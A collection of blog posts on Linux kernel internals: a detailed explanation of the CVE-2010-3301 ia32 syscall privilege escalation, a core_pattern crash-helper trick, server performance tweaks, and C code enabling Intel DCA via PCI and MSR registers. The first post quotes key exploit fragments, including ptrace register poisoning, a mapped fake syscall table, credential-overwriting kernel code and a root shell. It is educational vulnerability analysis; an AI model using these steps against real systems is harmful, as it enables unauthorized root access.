detailed explanation of a recent privilege escalation bug in linux (CVE-2010-3301) »

Created at: 27.09.2010 14:59, source: time to bleed by Joe Damato, tagged: linux security systems x86 bugfix kernel privilege escalation privileges syscall vulnerability x86_64


If you enjoy this article, subscribe (via RSS or e-mail) and follow me on twitter.

tl;dr

This article is going to explain how a recent privilege escalation exploit for the Linux kernel works. I’ll explain what the deal is from the kernel side and the exploit side.

This article is long and technical; prepare yourself.

ia32 syscall emulation

There are two ways to invoke system calls on the Intel/AMD family of processors:

  1. Software interrupt 0x80.
  2. The sysenter family of instructions.

The sysenter family of instructions is a faster syscall interface than the traditional int 0x80 interface, but isn’t available on some older 32-bit Intel CPUs.

The Linux kernel has a layer of code to allow syscalls executed via int 0x80 to work on newer kernels. When a system call is invoked with int 0x80, the kernel rearranges state to pass off execution to the desired system call, thus maintaining support for this older system call interface.

This code can be found at http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L380. We will examine this code much more closely very soon.

ptrace(2) and the ia32 syscall emulation layer

From the ptrace(2) man page (emphasis mine):

The ptrace() system call provides a means by which a parent process may observe and control the execution of another process, and examine and change its core image and registers. It is primarily used to implement break-point debugging and system call tracing.

If we examine the IA32 syscall emulation code we see some code in place to support ptrace [1]:

ENTRY(ia32_syscall)
/* . . . */
        GET_THREAD_INFO(%r10)
          orl $TS_COMPAT,TI_status(%r10)
        testl $_TIF_WORK_SYSCALL_ENTRY,TI_flags(%r10)
        jnz ia32_tracesys

This code is placing a pointer to the thread control block (TCB) into the register r10 and then checking if ptrace is listening for system call notifications. If it is, a secondary code path is entered.

Let’s take a look [2]:

ia32_tracesys:
        /* . . . */
        call syscall_trace_enter
        LOAD_ARGS32 ARGOFFSET  /* reload args from stack in case ptrace changed it */
        RESTORE_REST
        cmpl $(IA32_NR_syscalls-1),%eax
        ja  int_ret_from_sys_call       /* ia32_tracesys has set RAX(%rsp) */
        jmp ia32_do_call
END(ia32_syscall)

Notice the LOAD_ARGS32 macro and comment above. That macro reloads register values after the ptrace syscall notification has fired. This is really fucking important because the userland parent process listening for ptrace notifications may have modified the registers which were loaded with data to correctly invoke a desired system call. It is crucial that every register the system call depends on is reloaded from the saved state, so that the system call is invoked with a consistent set of values.

Also take note of the sanity check for %eax: cmpl $(IA32_NR_syscalls-1),%eax

This check is ensuring that the value in %eax is less than or equal to (number of syscalls – 1). If it is, it executes ia32_do_call.

Let’s take a look at the LOAD_ARGS32 macro [3]:

.macro LOAD_ARGS32 offset, _r9=0
/* . . . */
movl \offset+40(%rsp),%ecx
movl \offset+48(%rsp),%edx
movl \offset+56(%rsp),%esi
movl \offset+64(%rsp),%edi
.endm

Notice that the register %eax is left untouched by this macro, even after the ptrace parent process has had a chance to modify its contents.

Let’s take a look at ia32_do_call, which actually transfers execution to the system call [4]:

ia32_do_call:
        IA32_ARG_FIXUP
        call *ia32_sys_call_table(,%rax,8) # xxx: rip relative

The system call invocation code calls the function whose address is stored at byte offset (8 * %rax) from the start of ia32_sys_call_table. That is, the %rax-th entry in the ia32_sys_call_table, since each entry is an 8-byte pointer.

subtle bug leads to sexy exploit

This bug was originally discovered by the Polish hacker “cliph” in 2007, fixed, but then reintroduced accidentally in early 2008.

The exploit is made possible by three key things:

  1. The register %eax is not touched in the LOAD_ARGS32 macro and can be set to any arbitrary value by a call to ptrace.
  2. The ia32_do_call code uses %rax, not %eax, when indexing into the ia32_sys_call_table.
  3. The %eax check (cmpl $(IA32_NR_syscalls-1),%eax) in ia32_tracesys only checks %eax. Any bits in the upper 32 bits of %rax will be ignored by this check.

These three stars align and allow an attacker to cause an integer overflow in ia32_do_call, causing the kernel to hand off execution to an arbitrary address.

Damnnnnn, that’s hot.
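To make the mismatch concrete, here is a minimal user-space sketch in C (it is a model, not kernel code). It treats the 32-bit comparison and the 64-bit table index as two separate functions. NR_SYSCALLS and both function names are made up for illustration; the real value of IA32_NR_syscalls depends on the kernel version.

```c
#include <stdint.h>
#include <stdbool.h>

/* Hypothetical stand-in for IA32_NR_syscalls; the real value varies by kernel. */
#define NR_SYSCALLS 337u

/* Models `cmpl $(IA32_NR_syscalls-1),%eax`: only the low 32 bits are compared. */
bool passes_eax_check(uint64_t rax)
{
    uint32_t eax = (uint32_t)rax;      /* the upper 32 bits are silently dropped */
    return eax <= NR_SYSCALLS - 1;
}

/* Models `call *ia32_sys_call_table(,%rax,8)`: the full 64-bit rax is scaled. */
uint64_t table_byte_offset(uint64_t rax)
{
    return rax * 8;                    /* each table entry is an 8-byte pointer */
}
```

Feeding 0x800000101 to passes_eax_check returns true, because the low 32 bits are just 0x101, while table_byte_offset for the same value lands far outside any real syscall table.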

the exploit, step by step

The exploit code is available here and was written by Ben Hawkes and others.

The exploit begins execution by forking and having the child execute a second copy of itself:

        if ( (pid = fork()) == 0) {
                ptrace(PTRACE_TRACEME, 0, 0, 0);
                execl(argv[0], argv[0], "2", "3", "4", NULL);
                perror("exec fault");
                exit(1);
        }

The child process is set up to be traced with ptrace by issuing a PTRACE_TRACEME request.

The parent process enters a loop:

        for (;;) {
                if (wait(&status) != pid)
                        continue;

                /* ... */

                rax = ptrace(PTRACE_PEEKUSER, pid, 8*ORIG_RAX, 0);
                if (rax == 0x000000000101) {
                        if (ptrace(PTRACE_POKEUSER, pid, 8*ORIG_RAX, off/8) == -1) {
                                printf("PTRACE_POKEUSER fault\n");
                                exit(1);
                        }
                        set = 1;
                }

                /* ... */

                if (ptrace(PTRACE_SYSCALL, pid, 1, 0) == -1) {
                        printf("PTRACE_SYSCALL fault\n");
                        exit(1);
                }
         }

The parent calls wait and blocks until entry into a system call. When a system call is entered, ptrace is invoked to read the value of the rax register. If the value is 0x101, ptrace is invoked to set the value of rax to 0x800000101 to cause an overflow as we’ll see shortly. ptrace is then invoked to resume execution in the child.

While this is happening, the child process is executing. It begins by looking up the addresses of two symbols in the kernel:

	commit_creds = (_commit_creds) get_symbol("commit_creds");
	/* ... */

	prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
       /* ... */

Next, the child process attempts to create an anonymous memory mapping using mmap:

        if (mmap((void*)tmp, size, PROT_READ|PROT_WRITE|PROT_EXEC,
                MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
          /* ... */

This mapping is created at the address tmp. tmp is set earlier to: 0xffffffff80000000 + (0x0000000800000101 * 8) (stored in kern_s in main).

This value actually causes an overflow, and wraps around to: 0x3f80000808. mmap only creates mappings on page-aligned addresses, so the mapping is created at: 0x3f80000000. This mapping is 64 megabytes large (stored in size).
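The wraparound is easy to check by hand, but here is the arithmetic as a small C sketch. The two constants are the values quoted above; the function names and the 4 KiB page size are assumptions made for illustration.

```c
#include <stdint.h>

/* Values quoted in the text above. */
#define TABLE_BASE   0xffffffff80000000ULL  /* kern_s in the exploit */
#define POKED_RAX    0x0000000800000101ULL  /* value the parent pokes into rax */
#define PAGE_MASK_4K (~0xfffULL)            /* assumes 4 KiB pages */

/* Address the kernel ends up reading the "syscall handler" pointer from. */
uint64_t target_slot(uint64_t base, uint64_t rax)
{
    return base + rax * 8;     /* unsigned 64-bit arithmetic wraps modulo 2^64 */
}

/* Round an address down to the start of its page, as a fixed mapping needs. */
uint64_t page_align_down(uint64_t addr)
{
    return addr & PAGE_MASK_4K;
}
```

target_slot(TABLE_BASE, POKED_RAX) gives 0x3f80000808, and page_align_down of that gives 0x3f80000000, matching the numbers above.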

Next comes a function called kernelmodecode, which makes use of the symbols commit_creds and prepare_kernel_cred that were looked up earlier:

int kernelmodecode(void *file, void *vma)
{
	commit_creds(prepare_kernel_cred(0));
	return -1;
}

The address of that function is written over and over to the 64 MB of memory that was mapped in:

        for (; (uint64_t) ptr < (tmp + size); ptr++)
                *ptr = (uint64_t)kernelmodecode;

Finally, the child process executes syscall number 0x101 and then executes a shell after the system call returns:

        __asm__("\n"
        "\tmovq $0x101, %rax\n"
        "\tint $0x80\n");

        /* . . . */
        execl("/bin/sh", "bin/sh", NULL);

tying it all together

When system call 0x101 is executed, the parent process (described above) receives a notification that a system call is being entered. The parent process then sets rax to a value which will cause an overflow: 0x800000101 and resumes execution in the child.

The child executes the erroneous check described above:

        cmpl $(IA32_NR_syscalls-1),%eax
        ja  int_ret_from_sys_call       /* ia32_tracesys has set RAX(%rsp) */
        jmp ia32_do_call

Which succeeds, because it is only comparing the lower 32 bits of rax (0x101) to IA32_NR_syscalls-1.

Next, execution continues to ia32_do_call, which causes an overflow, since rax contains a very large value.

call *ia32_sys_call_table(,%rax,8)

Instead of calling the function whose address is stored in the ia32_sys_call_table, the address is pulled from the memory the child process mapped in, which contains the address of the function kernelmodecode.

kernelmodecode is part of the exploit, but the kernel has access to the entire address space and is free to begin executing code wherever it chooses. As a result, kernelmodecode executes in kernel mode, setting the privileges of the process to those of init.

The system has been rooted.

The fix

The fix is to zero the upper half of rax and change the comparison to examine the entire register. You can see the diffs of the fix here and here.
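As a rough user-space model of what the fix achieves (a sketch, not the actual kernel patch; NR_SYSCALLS and the function names are illustrative assumptions), either half of the fix is enough to stop the poisoned value:

```c
#include <stdint.h>
#include <stdbool.h>

/* Hypothetical stand-in for IA32_NR_syscalls; the real value varies by kernel. */
#define NR_SYSCALLS 337u

/* Compare the whole 64-bit register, so stray upper bits fail the check. */
bool passes_rax_check(uint64_t rax)
{
    return rax <= (uint64_t)(NR_SYSCALLS - 1);
}

/* Zero-extend the low 32 bits, like a 32-bit load into %eax does on x86_64. */
uint64_t truncate_to_eax(uint64_t rax)
{
    return (uint64_t)(uint32_t)rax;
}
```

With the full-width comparison, 0x800000101 is rejected outright. With the truncation, it collapses back to 0x101 and indexes the real table.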

Conclusions

  • Reading exploit code is fun. Sometimes you find particularly sexy exploits like this one.
  • The IA32 syscall emulation layer is, in general, pretty wild. I would not be surprised if more bugs are discovered in this section of the kernel.
  • Code reviews play a really important part in the overall security of the Linux kernel, but subtle bugs like this are very difficult to catch via code review.
  • I'm not a Ruby programmer.


References

  1. http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L424
  2. http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L439
  3. http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L50
  4. http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L430



an obscure kernel feature to get more info about dying processes »

Created at: 20.09.2010 14:59, source: time to bleed by Joe Damato, tagged: linux monitoring systems kernel



tl;dr

This post will describe how I stumbled upon a code path in the Linux kernel which allows external programs to be launched when a core dump is about to happen. I provide a link to a short and ugly Ruby script which captures a faulting process, runs gdb to get a backtrace (and other information), captures the core dump, and then generates a notification email.

I don’t care about faults because I use monit, god, etc

Chill.

Your processes may get automatically restarted when a fault occurs and you may even get an email letting you know your process died. Both of those things are useful, but it turns out that with just a tiny bit of extra work you can actually get very detailed emails showing a stack trace, register information, and a snapshot of the process’ files in /proc.

random walking the linux kernel

One day I was sitting around wondering how exactly the coredump code paths are wired. I cracked open the kernel source and started reading.

It wasn’t long until I saw this piece of code from exec.c [1]:

void do_coredump(long signr, int exit_code, struct pt_regs *regs)
{
  /* .... */
  lock_kernel();
  ispipe = format_corename(corename, signr);
  unlock_kernel();

   if (ispipe) {
   /* ... */

Hrm. ispipe? That seems interesting. I wonder what format_corename does and what ispipe means. Following through and reading format_corename [2]:

static int format_corename(char *corename, long signr)
{
	/* ... */

        const char *pat_ptr = core_pattern;
        int ispipe = (*pat_ptr == '|');

	/* ... */

        return ispipe;
}

In the above code, core_pattern (which can be set with a sysctl or via /proc/sys/kernel/core_pattern) is examined to determine if the first character is a |. If so, format_corename returns 1. So | seems relatively important, but at this point I’m still unclear on what it actually means.
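Here is the same check as a tiny stand-alone C sketch. The function names are made up for illustration; the kernel does this inline in format_corename, and skipping the first character to get at the command is my assumption about how the rest of the string is used.

```c
#include <stdbool.h>
#include <stddef.h>

/* True when a core_pattern string starts with '|', i.e. asks for a pipe. */
bool core_pattern_is_pipe(const char *pattern)
{
    return pattern != NULL && pattern[0] == '|';
}

/* For a piped pattern, the helper command line starts right after the '|'.
 * Returns NULL when the pattern is not a pipe. */
const char *core_pattern_command(const char *pattern)
{
    return core_pattern_is_pipe(pattern) ? pattern + 1 : NULL;
}
```

A plain pattern like "core" is not a pipe, while "|/path/to/helper %p" is, and its command part is "/path/to/helper %p".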

Scanning the rest of the code for do_coredump reveals something very interesting [3] (this is more code from the function in the first code snippet above):

     /* ... */

     helper_argv = argv_split(GFP_KERNEL, corename+1, NULL);

     /* ... */

     retval = call_usermodehelper_fns(helper_argv[0], helper_argv,
                             NULL, UMH_WAIT_EXEC, umh_pipe_setup,
                             NULL, &cprm);

    /* ... */

WTF? call_usermodehelper_fns? umh_pipe_setup? This is looking pretty interesting. If you follow the code down a few layers, you end up at call_usermodehelper_exec which has the following very enlightening comment:

/**
 * call_usermodehelper_exec - start a usermode application
 *
 *  . . .
 *
 * Runs a user-space application.  The application is started
 * asynchronously if wait is not set, and runs as a child of keventd.
 * (ie. it runs with full root capabilities).
 */

what it all means

All together this is actually pretty fucking sick:

  • You can set /proc/sys/kernel/core_pattern to run a script when a process is going to dump core.
  • Your script is run before the process is killed.
  • A pipe is opened and attached to your script. The kernel writes the coredump to the pipe. Your script can read it and write it to storage.
  • Your script can attach GDB, get a backtrace, and gather other information to send a detailed email.

But the coolest part of all:

  • All of the files in /proc/[pid] for that process remain intact and can be inspected. You can check the open file descriptors, the process’s memory map, and much much more.

ruby codez to harness this amazing code path

I whipped up a pretty simple, ugly, ruby script. You can get it here. I set up my system to use it by:

% echo "|/path/to/core_helper.rb %p %s %u %g" > /proc/sys/kernel/core_pattern

Where:

  • %p – PID of the dying process
  • %s – signal number causing the core dump
  • %u – real user id of the dying process
  • %g – real group id of the dying process
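My helper is a Ruby script, but the core of any such helper is the same: the kernel hands you the core dump on stdin and you copy it somewhere. Here is a minimal sketch of that copy loop in C. This is not the script linked above; copy_stream is a hypothetical name, and where you write the output is up to you.

```c
#include <stdio.h>

/* Copy everything from `in` to `out`.
 * Returns the number of bytes copied, or -1 on a read or write error. */
long copy_stream(FILE *in, FILE *out)
{
    char buf[4096];
    long total = 0;
    size_t n;

    while ((n = fread(buf, 1, sizeof(buf), in)) > 0) {
        if (fwrite(buf, 1, n, out) != n)
            return -1;          /* short write: give up */
        total += (long)n;
    }
    return ferror(in) ? -1 : total;
}
```

A helper's main would open an output file named after the PID it receives in argv[1] (the %p above) and call copy_stream(stdin, out).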

Why didn’t you read the documentation instead?

This (as far as I can tell) little-known feature is documented at linux-kernel-source/Documentation/sysctl/kernel.txt under the “core_pattern” section. I didn’t read the documentation because (little known fact) I actually don’t know how to read. I found the code path randomly and it was much more fun and interesting to discover this little feature by diving into the code.

Conclusion

  • This could/should probably be a feature/plugin/whatever for god/monit/etc instead of a stand-alone script.
  • Reading code to discover features doesn’t scale very well, but it is a lot more fun than reading documentation all the time. Also, you learn stuff and reading code makes you a better programmer.

References

  1. http://lxr.linux.no/linux+v2.6.35.4/fs/exec.c#L1836
  2. http://lxr.linux.no/linux+v2.6.35.4/fs/exec.c#L1446
  3. http://lxr.linux.no/linux+v2.6.35.4/fs/exec.c#L1836



Useful kernel and driver performance tweaks for your Linux server »

Created at: 28.07.2009 13:20, source: time to bleed by Joe Damato, tagged: linux monitoring systems BIOS kernel performance scaling system health x86 x86_64


This article is going to address some kernel and driver tweaks that are interesting and useful. We use several of these in production with excellent performance, but you should proceed with caution and do research prior to trying anything listed below.

Tickless System

The tickless kernel feature allows for on-demand timer interrupts. This means that during idle periods, fewer timer interrupts will fire, which should lead to power savings, cooler running systems, and fewer useless context switches.

Kernel option: CONFIG_NO_HZ=y

Timer Frequency

You can select the rate at which timer interrupts in the kernel will fire. When a timer interrupt fires on a CPU, the process running on that CPU is interrupted while the timer interrupt is handled. Reducing the rate at which the timer fires allows for fewer interruptions of your running processes. This option is particularly useful for servers with multiple CPUs where processes are not running interactively.

Kernel options: CONFIG_HZ_100=y and CONFIG_HZ=100

Connector

The connector module is a kernel module which reports process events such as fork, exec, and exit to userland. This is extremely useful for process monitoring. You can build a simple system (or use an existing one like god) to watch mission-critical processes. If the processes die due to a signal (like SIGSEGV, or SIGBUS) or exit unexpectedly you’ll get an asynchronous notification from the kernel. The processes can then be restarted by your monitor keeping downtime to a minimum when unexpected events occur.

Kernel options: CONFIG_CONNECTOR=y and CONFIG_PROC_EVENTS=y

TCP segmentation offload (TSO)

A popular feature among newer NICs is TCP segmentation offload (TSO). This feature allows the kernel to offload the work of dividing large packets into smaller packets to the NIC. This frees up the CPU to do more useful work and reduces the amount of overhead that the CPU passes along the bus. If your NIC supports this feature, you can enable it with ethtool:

[joe@timetobleed]% sudo ethtool -K eth1 tso on

Let’s quickly verify that this worked:

[joe@timetobleed]% sudo ethtool -k eth1
Offload parameters for eth1:
rx-checksumming: on
tx-checksumming: on
scatter-gather: on
tcp segmentation offload: on
udp fragmentation offload: off
generic segmentation offload: on
large receive offload: off

[joe@timetobleed]% dmesg | tail -1
[892528.450378] 0000:04:00.1: eth1: TSO is Enabled

Intel I/OAT DMA Engine

This kernel option enables the Intel I/OAT DMA engine that is present in recent Xeon CPUs. This option increases network throughput as the DMA engine allows the kernel to offload network data copying from the CPU to the DMA engine. This frees up the CPU to do more useful work.

Check to see if it’s enabled:

[joe@timetobleed]% dmesg | grep ioat
ioatdma 0000:00:08.0: setting latency timer to 64
ioatdma 0000:00:08.0: Intel(R) I/OAT DMA Engine found, 4 channels, device version 0x12, driver version 3.64
ioatdma 0000:00:08.0: irq 56 for MSI/MSI-X

There’s also a sysfs interface where you can get some statistics about the DMA engine. Check the directories under /sys/class/dma/.

Kernel options: CONFIG_DMADEVICES=y and CONFIG_INTEL_IOATDMA=y and CONFIG_DMA_ENGINE=y and CONFIG_NET_DMA=y and CONFIG_ASYNC_TX_DMA=y

Direct Cache Access (DCA)

Intel’s I/OAT also includes a feature called Direct Cache Access (DCA). DCA allows a driver to warm a CPU cache. A few NIC drivers support DCA; the most popular (to my knowledge) is the Intel 10GbE driver (ixgbe). Refer to your NIC driver documentation to see if your NIC supports DCA. To enable DCA, a switch in the BIOS must be flipped. Some vendors supply machines that support DCA, but don’t expose a switch for DCA. If that is the case, see my last blog post for how to enable DCA manually.

You can check if DCA is enabled:

[joe@timetobleed]% dmesg | grep dca
dca service started, version 1.8

If DCA is possible on your system but disabled you’ll see:

ioatdma 0000:00:08.0: DCA is disabled in BIOS

Which means you’ll need to enable it in the BIOS or manually.

Kernel option: CONFIG_DCA=y

NAPI

The “New API” (NAPI) is a rework of the packet processing code in the kernel to improve performance for high speed networking. NAPI provides two major features [1]:

Interrupt mitigation: High-speed networking can create thousands of interrupts per second, all of which tell the system something it already knew: it has lots of packets to process. NAPI allows drivers to run with (some) interrupts disabled during times of high traffic, with a corresponding decrease in system load.

Packet throttling: When the system is overwhelmed and must drop packets, it’s better if those packets are disposed of before much effort goes into processing them. NAPI-compliant drivers can often cause packets to be dropped in the network adaptor itself, before the kernel sees them at all.

Many recent NIC drivers automatically support NAPI, so you don’t need to do anything. Some drivers need you to explicitly specify NAPI in the kernel config or on the command line when compiling the driver. If you are unsure, check your driver documentation. A good place to look for docs is in your kernel source under Documentation, available on the web here: http://lxr.linux.no/linux+v2.6.30/Documentation/networking/ but be sure to select the correct kernel version, first!

Older e1000 drivers (newer drivers, do nothing): make CFLAGS_EXTRA=-DE1000_NAPI install

Throttle NIC Interrupts

Some drivers allow the user to specify the rate at which the NIC will generate interrupts. The e1000e driver allows you to pass a command line option, InterruptThrottleRate, when loading the module with insmod. For the e1000e there are two dynamic interrupt throttle mechanisms, specified on the command line as 1 (dynamic) and 3 (dynamic conservative). The adaptive algorithm classifies traffic into different classes and adjusts the interrupt rate appropriately. The difference between dynamic and dynamic conservative is the rate for the “Lowest Latency” traffic class: dynamic (1) has a much more aggressive interrupt rate for this traffic class.

As always, check your driver documentation for more information.

With insmod: insmod e1000e.o InterruptThrottleRate=1

Process and IRQ affinity

Linux allows the user to specify which CPUs processes and interrupt handlers are bound to.

  • Processes: You can use taskset to specify which CPUs a process can run on
  • Interrupt Handlers: The interrupt map can be found in /proc/interrupts, and the affinity for each interrupt can be set in the file smp_affinity in the directory for each interrupt under /proc/irq/

This is useful because you can pin the interrupt handlers for your NICs to specific CPUs so that when a shared resource is touched (a lock in the network stack) and loaded to a CPU cache, the next time the handler runs, it will be put on the same CPU avoiding costly cache invalidations that can occur if the handler is put on a different CPU.

However, improvements of up to 24% have been reported [2] when processes and the IRQs for the NICs the processes get data from are pinned to the same CPUs. Doing this ensures that the data loaded into the CPU cache by the interrupt handler can be used (without invalidation) by the process; extremely high cache locality is achieved.
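The smp_affinity file takes a hexadecimal CPU bitmask, which is easy to get wrong by hand. Here is a small C sketch that builds one from a list of CPU numbers. The function names are made up for illustration, and the sketch only handles CPUs 0 through 31 (a single 32-bit mask word), which is a simplifying assumption.

```c
#include <stdio.h>
#include <stddef.h>
#include <stdint.h>

/* Build a bitmask with one bit set per CPU number (CPUs 0..31 only). */
uint32_t cpu_mask(const int *cpus, size_t count)
{
    uint32_t mask = 0;
    for (size_t i = 0; i < count; i++) {
        if (cpus[i] >= 0 && cpus[i] < 32)
            mask |= (uint32_t)1 << cpus[i];
    }
    return mask;
}

/* Format the mask as a hex string suitable for writing to smp_affinity.
 * Returns the number of characters snprintf wanted to write. */
int format_smp_affinity(uint32_t mask, char *buf, size_t len)
{
    return snprintf(buf, len, "%x", (unsigned int)mask);
}
```

For example, pinning an interrupt to CPUs 0 and 2 yields the mask 0x5, so the string written to the smp_affinity file for that IRQ would be "5".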

oprofile

oprofile is a system-wide profiler that can profile both kernel and application level code. There is a kernel driver for oprofile which collects data from the x86’s Model Specific Registers (MSRs) to give very detailed information about the performance of running code. oprofile can also annotate source code with performance information to make fixing bottlenecks easy. See oprofile’s homepage for more information.

Kernel options: CONFIG_OPROFILE=y and CONFIG_HAVE_OPROFILE=y

epoll

epoll(7) is useful for applications which must watch for events on large numbers of file descriptors. The epoll interface is designed to easily scale to large numbers of file descriptors. epoll is already enabled in most recent kernels, but some strange distributions (which will remain nameless) have this feature disabled.

Kernel option: CONFIG_EPOLL=y
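If you have never used epoll, here is a minimal sketch of the three calls involved (create, register, wait), watching a single descriptor. The helper name wait_readable is made up; a real server would keep one epoll instance around and register many descriptors instead of creating one per call.

```c
#include <sys/epoll.h>
#include <unistd.h>

/* Wait up to timeout_ms for fd to become readable.
 * Returns 1 if readable, 0 on timeout, -1 on error. */
int wait_readable(int fd, int timeout_ms)
{
    struct epoll_event ev = { .events = EPOLLIN, .data.fd = fd };
    struct epoll_event ready;
    int result;

    int epfd = epoll_create1(0);            /* new epoll instance */
    if (epfd < 0)
        return -1;

    if (epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &ev) < 0) {   /* register fd */
        close(epfd);
        return -1;
    }

    result = epoll_wait(epfd, &ready, 1, timeout_ms);    /* block for events */
    close(epfd);
    return result;   /* number of ready descriptors: 0 or 1 here, -1 on error */
}
```

If this fails to build or epoll_create1 returns an error on your system, that is a good hint that your kernel was built without CONFIG_EPOLL or is too old for epoll_create1.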

Conclusion

  • There are a lot of useful levers that can be pulled when trying to squeeze every last bit of performance out of your system
  • It is extremely important to read and understand your hardware documentation if you hope to achieve the maximum throughput your system can achieve
  • You can find documentation for your kernel online at the Linux LXR. Make sure to select the correct kernel version because docs change as the source changes!

Thanks for reading and don’t forget to subscribe (via RSS or e-mail) and follow me on twitter.

References

  1. http://www.linuxfoundation.org/en/Net:NAPI
  2. http://software.intel.com/en-us/articles/improved-linux-smp-scaling-user-directed-processor-affinity/



Enabling BIOS options on a live server with no rebooting »

Created at: 06.07.2009 16:00, source: time to bleed by Joe Damato, tagged: linux scaling systems x86 BIOS kernel performance x86_64


This blog post is going to describe a C program that toggles some CPU and chipset registers directly to enable Direct Cache Access without needing a reboot or a switch in the BIOS. A very fun hack to write and investigate.

Special thanks…

Special thanks going out to Roman Nurik for helping me make the code CSS much, much prettier and easier to read.

Special thanks going out to Jake Douglas for convincing me that I shouldn’t use a stupid sensationalist title for this blog article :)

Intel I/OAT and Direct Cache Access (DCA)

From the Linux Foundation I/OAT project page [1]:

I/OAT (I/O Acceleration Technology) is the name for a collection of techniques by Intel to improve network throughput. The most significant of these is the DMA engine. The DMA engine is meant to offload from the CPU the copying of [socket buffer] data to the user buffer. This is not a zero-copy receive, but does allow the CPU to do other work while the copy operations are performed by the DMA engine.

Cool! So by using I/OAT the network stack in the Linux kernel can offload copy operations to increase throughput. I/OAT also includes a feature called Direct Cache Access (DCA) which can deliver data directly into processor caches. This is particularly cool because when a network interrupt arrives and data is copied to system memory, the CPU that accesses this data will not take a cache miss, because DCA has already put the data it needs in the cache. Sick.

Measurements from the Linux Foundation project [2] indicate a 10% reduction in CPU usage, while the Myri-10G NIC website claims they’ve measured a 40% reduction in CPU usage [3]. For more information describing the performance benefits of DCA see this incredibly detailed paper: Direct Cache Access for High Bandwidth Network I/O.

How to get I/OAT and DCA

To get I/OAT and DCA you need a few things:

  • Intel XEON CPU(s)
  • A NIC(s) which has DCA support
  • A chipset which supports DCA
  • The ioatdma and dca Linux kernel modules
  • And last but not least, a switch in your BIOS to turn DCA on

That last item can actually be a bit more tricky than it sounds for several reasons:

  • Some BIOSes don’t expose a way to turn DCA on even though it is supported by the CPU, chipset, and NIC!
  • Your hosting provider may not allow BIOS access
  • Your system might be up and running and you don’t want to reboot to enter the BIOS to enable DCA

Let’s see what you can do to coerce DCA into working on your system if one of the above applies to you.

Build ioatdma kernel module

This is pretty easy, just make menuconfig and toggle I/OAT as a module. You must build it as a module if you cannot or do not want to enable DCA in your BIOS.

The option can be found in Device Drivers -> DMA Engine Support -> Intel I/OAT DMA Support.

Toggling that option will build the ioatdma and dca modules. Build and install the new module.

Enabling DCA without a reboot or BIOS access: Hack overview

In order to enable DCA a few special registers need to be touched.

  • The DCA capability bit in the PCI Express Control Register 4 in the configuration space for the PCI bridge your NIC(s) are attached to.
  • The DCA Model Specific Register on your CPU(s)

Let’s take a closer look at each stage of the hack.

Enable DCA in PCI Configuration Space

PCI configuration space is a memory region where control registers for PCI devices live. By changing register values, you can enable/disable specific features of that PCI device. The configuration space is addressable if you know the PCI bus, device, and function bits for a specific PCI device and the feature you care about.

To find the DCA register for the Intel 5000, 5100, and 7300 chipsets, we need to consult the documentation [4]:


Cool, so the register needed lives at offset 0x64. To enable DCA, bit 6 needs to be set to 1.

Toggling these registers can be a bit cumbersome, but luckily there is libpci, which provides some simple APIs to scan for PCI devices and access configuration space registers.

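#include <stdio.h>
#include <stdlib.h>   /* exit */
#include <fcntl.h>    /* open */
#include <unistd.h>   /* pread, pwrite, close */
#include <pci/pci.h>  /* libpci */

#define INTEL_BRIDGE_DCAEN_OFFSET   0x64
#define INTEL_BRIDGE_DCAEN_BIT      6
#define PCI_HEADER_TYPE_BRIDGE     1
#define PCI_VENDOR_ID_INTEL        0x8086 /* lol @ intel */
#define PCI_HEADER_TYPE             0x0e
#define MSR_P6_DCA_CAP             0x000001f8

/* defined in the MSR section below */
void msr_dca_enable(void);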

void check_dca(struct pci_dev *dev)
{
  /* read DCA status */
  u32 dca = pci_read_long(dev, INTEL_BRIDGE_DCAEN_OFFSET);

  /* if it's not enabled */
  if (!(dca & (1 << INTEL_BRIDGE_DCAEN_BIT))) {
    printf("DCA disabled, enabling now.\n");

    /* enable it */
    dca |= 1 << INTEL_BRIDGE_DCAEN_BIT;

    /* write it back */
    pci_write_long(dev, INTEL_BRIDGE_DCAEN_OFFSET, dca);
  } else {
    printf("DCA already enabled!\n");
  }
}

int main(void)
{
  struct pci_access *pacc;
  struct pci_dev *dev;
  u8 type;

  pacc = pci_alloc();
  pci_init(pacc);

  /* scan the PCI bus */
  pci_scan_bus(pacc);

  /* for each device */
  for (dev = pacc->devices; dev; dev=dev->next) {
    pci_fill_info(dev, PCI_FILL_IDENT | PCI_FILL_BASES);

    /* if it's an intel device */
    if (dev->vendor_id == PCI_VENDOR_ID_INTEL) {

        /* read the header type byte; bit 7 is the multi-function flag, so mask it off */
        type = pci_read_byte(dev, PCI_HEADER_TYPE) & 0x7f;

        /* if its a PCI bridge, check and enable DCA */
        if (type == PCI_HEADER_TYPE_BRIDGE) {
          check_dca(dev);
        }
    }
  }

  msr_dca_enable();
  return 0;
}

Enable DCA in the CPU MSR

A model specific register (MSR) is a control register that is provided by a CPU to enable a feature that exists on a specific CPU. In this case, we care about the DCA MSR. In order to find its address, let’s consult the Intel Developer’s Manual 3B [5].

This register lives at address 0x1f8. We just need to set it to 1 and we should be good to go.

Thankfully, there are device files in /dev for the MSRs of each CPU:

#define MSR_P6_DCA_CAP      0x000001f8
void msr_dca_enable(void)
{
  char msr_file_name[64];
  int fd = 0, i = 0;
  u64 data;

  /* for each CPU */
  for (;i < NUM_CPUS; i++) {
    sprintf(msr_file_name, "/dev/cpu/%d/msr", i);

    /* open the MSR device file */
    fd = open(msr_file_name, O_RDWR);
    if (fd < 0) {
      perror("open failed!");
      exit(1);
    }

    /* read the current DCA status */
    if (pread(fd, &data, sizeof(data), MSR_P6_DCA_CAP) != sizeof(data)) {
      perror("reading msr failed!");
      exit(1);
    }

    printf("got msr value: %*llx\n", 1, (unsigned long long)data);

    /* if DCA is not enabled */
    if (!(data & 1)) {

      /* enable it */
      data |= 1;

      /* write it back */
      if (pwrite(fd, &data, sizeof(data), MSR_P6_DCA_CAP) != sizeof(data)) {
        perror("writing msr failed!");
        exit(1);
      }
    } else {
      printf("msr already enabled for CPU %d\n", i);
    }

    /* done with this CPU's MSR device file */
    close(fd);
  }
}
